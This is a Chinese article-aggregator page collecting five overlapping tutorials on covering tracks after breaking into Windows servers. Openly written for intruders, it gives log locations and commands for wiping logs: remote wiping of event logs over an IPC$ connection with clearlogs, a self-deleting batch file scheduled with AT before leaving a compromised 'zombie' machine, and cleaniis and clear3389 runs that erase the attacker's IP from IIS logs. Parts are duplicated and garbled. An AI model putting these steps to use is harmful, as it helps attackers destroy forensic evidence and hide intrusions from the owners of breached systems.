入侵后的3个重要痕迹清理

时间:2024-02-23 07:16:50 其他范文 收藏本文 下载本文

入侵后的3个重要痕迹清理(锦集5篇)由网友“lqm321”投稿提供,下面是小编为大家整理后的入侵后的3个重要痕迹清理,仅供参考,大家一起来看看吧。

入侵后的3个重要痕迹清理

篇1:入侵后的3个重要痕迹清理

清理你入侵后的三个重要痕迹

应用程序日志

安全日志

系统日志

DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小,安全日志文件:%systemroot%system32configSecEvent.EVT

系统日志文件:%systemroot%system32configSysEvent.EVT

应用程序日志文件:%systemroot%system32configAppEvent.EVT

FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个

WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,

它们这些LOG文件在注册表中的:

HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志安全日志应用程序日志等等,它们的服务是Windos的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.

下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的“暂停” 或“停止” 操作,

怎么清除系统日志.

怎么利用工具清除IIS日志

怎么清除历史和cookie

怎么察看防火墙 Blackice的日志

netstat -an 表示的什么意思

--------------------------------------------------------------------------------------------------------------

1. 系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法:

Usage: clearlogs [\computername] <-app / -sec / -sys>

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: net use \ipipc$ 密码/user:用户名

** 然后开始清除: 方法

clearlogs \ip -app 这个是清除远程计算机的应用程序日志

clearlogs \ip -sec 这个是清除远程计算机的安全日志

clearlogs \ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除.  方法:

clearlogs  -app 这个是清除远程计算机的应用程序日志

clearlogs

篇2:如何清理你入侵后的三个重要痕迹

应用程序日志、

安全日志、

系 统日志、

DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小,安全日志文件:%systemroot%system32configSecEvent.EVT

系统日志文件:%systemroot%system32configSysEvent.EVT

应用程序日志文件:%systemroot%system32configAppEvent.EVT

FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个

WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,

它们这些LOG文件在注册表中的:

HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.

下 面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的“暂停” 或“停止” 操作。

怎么清除系统日志.

怎么利用工具清除IIS日志

怎么清除历史和cookie

怎么察看防火墙Blackice的日志

netstat -an 表示的什么意思

===================================

1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法:

Usage: clearlogs [\computername] <-app / -sec / -sys>

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: net use \ipipc$ 密码/user:用户名

** 然后开始清除: 方法

clearlogs \ip -app 这个是清除远程计算机的应用程序日志

clearlogs \ip -sec 这个是清除远程计算机的安全日志

clearlogs \ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志

clearlogs -sec 这个是清除远程计算机的安全日志

clearlogs -sys 这个是清除远程计算机的系统日志

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.

例如建立一个 c.bat

rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果

第一行表示: 运行时不显示窗口

第二行表示: 清除应用程序日志

第三行表示: 清除安全日志

第四行表示: 清除系统日志

第五行表示: 删除 clearlogs.exe 这个工具

第六行表示: 删除 c.bat 这个批处理文件

第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:c.bat

之后你就可以安全离开了. 这样才更安全一点.

===================================

篇3: 入侵后的痕迹清理

。安全日志文件 复制内容到剪贴板 代码:%systemroot%\system32\config\SecEvent.EVT

系统日志文件 复制内容到剪贴板 代码:%systemroot%\system32\config\SysEvent.EVT

应用程序日志文件 复制内容到剪贴板 代码:%systemroot%\system32\config\AppEvent.EVT

FTP日志默认位置 复制内容到剪贴板 代码:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个

WWW日志默认位置 复制内容到剪贴板 代码:%systemroot%\system32\logfiles\w3svc1\

默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,

它们这些LOG文件在注册表中的: 复制内容到剪贴板 代码:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Wind

os的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.

下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! 复制内容到剪贴板 代码:D:\SERVER\system32\LogFiles\W3SVC1>net sto

p eventlog 这项服务无法接受请求的“暂停” 或“停止” 操作。

怎么清除系统日志.

怎么利用工具清除IIS日志

怎么清除历史和cookie

怎么察看防火墙Blackice的日志

netstat -an 表示的什么意思

===================================

1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法: 复制内容到剪贴板 代码:Usage: clearlogs [\\computername] <-app / -sec / -sys>

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: 复制内容到剪贴板 代码:net use \\ip\ipc$ 密码/user:用户名

** 然后开始清除: 方法 复制内容到剪贴板 代码:clearlogs \\ip -app

这个是清除远程计算机的应用程序日志 复制内容到剪贴板 代码:clearlogs \\ip -sec 这个是清除远程计算机的安全日志

复制内容到剪贴板 代码:clearlogs \\ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除. 方法: 复制内容到剪贴板 代码:clearlogs -app

这个是清除远程计算机的应用程序日志 复制内容到剪贴板 代码:clearlogs -sec

这个是清除远程计算机的安全日志 复制内容到剪贴板 代码:clearlogs -sys

这个是清除远程计算机的系统日志

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以

离开你的肉鸡了.

例如建立一个 c.bat 复制内容到剪贴板 代码:rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果

第一行表示: 运行时不显示窗口

第二行表示: 清除应用程序日志

第三行表示: 清除安全日志

第四行表示: 清除系统日志

第五行表示: 删除 clearlogs.exe 这个工具

第六行表示: 删除 c.bat 这个批处理文件

第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:\c.bat

之后你就可以安全离开了. 这样才更安全一点.

===================================

2.清除iis日志:

工具:cleaniis.exe

使用方法: 复制内容到剪贴板 代码:iisantidote

iisantidote stop

stop opiton will stop iis before clearing the files and restart it after

exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \

使用方法解释:

cleaniis.exe iis日志存放的路径 清除参数

什么意思呢??我来给大家举个例子吧: 复制内容到剪贴板 代码:cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1

这个表示清除log中所有此IP(192.168.0.1)地址的访问记录. -----推荐使用这种方法 复制内容到剪贴板 代码:cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/

这个表示清除这个目录里面的所以的日志 复制内容到剪贴板 代码:c:\winnt\system32\logfiles\w3svc1

代表是iis日志的位置(windows nt/2000) 这个路径可以改变 复制内容到剪贴板 代码:c:\windows\system32\logfiles\w3svc1

代表是iis日志的位置(windows xp/) 这个路径可以改变

这个测试表示 在日志里面没有这个ip地址.

我们看一下日志的路径 再来看一下

我们的ip(192.168.0.1)已经没有了.

已经全部清空.

同样这个也可以建立批处理. 方法同上面的那个.

===================================

3.清除历史记录及运行的日志:

cleaner.exe

直接运行就可以了.

===================================

4.察看blackice的日志.

这个地方我们可以清除的看到 防火墙的日志.

这个表示 有人发过来带有病毒的email附件. ip是: 220.184.153.116

tcp_probe_other 表示 通过tcp 扫描 或者利用别的和你建立连接 通信

这个表示通过端口 80 扫描iis

病毒 nimda

这里需要很多的计算机协议知识. 同时也需要对英语有了解

才能更好的分析 如果对英语不好 你可以装一个金山词霸.

一般情况下 我们可以 对一些可以不用管.

一般这三种情况 不用去管.

最上面的 critical 这个 可以去关注一下 . 一般是确实有别的计算机扫描或者入侵你的计算机

count 代表次数 intruder 是对方的ip event 是通过什么方式(协议) 扫描或者想入侵的

time表示时间

篇4: 手把手教你如何清理入侵痕迹

入侵后的三个重要痕迹分别是:应用程序日志、安全日志 和系统日志,

手把手教你如何清理入侵痕迹

。 以下日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志 DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大?0踩日志文

篇5:入侵服务器之后痕迹的清理

来源:刀客城

自己总结的,也不知道对不对

打开事件管理,然后在左边右键,清除所有的,然后打开C盘,C:\WINDOWS\system32\LogFiles

目录下每个文件加内有TXT的,删了,或打开,把关于你的东西修改了,如果没法删,那就在CMD下输入

net stop 加目录名字,但是这里HTTPERR只输入HTTP,

入侵服务器之后痕迹的清理

W什么的目录不加后面的数字,不然出错,没法停止,然后就可以删了,下来我们把一个工具放到服务器上,

clear3389.exe

百度有,用法是,CMD下,输入这个软件的路径加空格,加clear3389.exe cleaniislog . 加你的IP就可以了

这样基本就可以清除了

突发暴雨应急预案

金山毒霸使用教程之清理专家功能篇

闭上眼睛,清理你的心

金山毒霸使用教程之防御监控

微软确认 Home Server存在漏洞 可能导致数据丢失

计算机信息安全风险及应对策略论文

来自新世界读后感

通信技术在通信监控的应用论文

铁路技术员工作总结

环境保护工程

入侵后的3个重要痕迹清理
《入侵后的3个重要痕迹清理.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【入侵后的3个重要痕迹清理(锦集5篇)】相关文章:

安全工具暗藏杀机:快速识别后门程序2022-12-20

Vista下的数据保护策略:卷影2022-10-27

电脑新手常见电脑显示属性问题2024-01-02

网络工程师年终工作总结2022-10-18

加强网络和信息安全管理工作方案2022-08-17

学校卫生学生演讲稿2022-06-23

豁然开朗800字中考常见作文2024-05-01

如何重构中国现当代文学思潮史论文2024-04-05

水浒传读后感简短心得感悟2023-01-18

文明的困惑散文2022-05-06

点击下载本文文档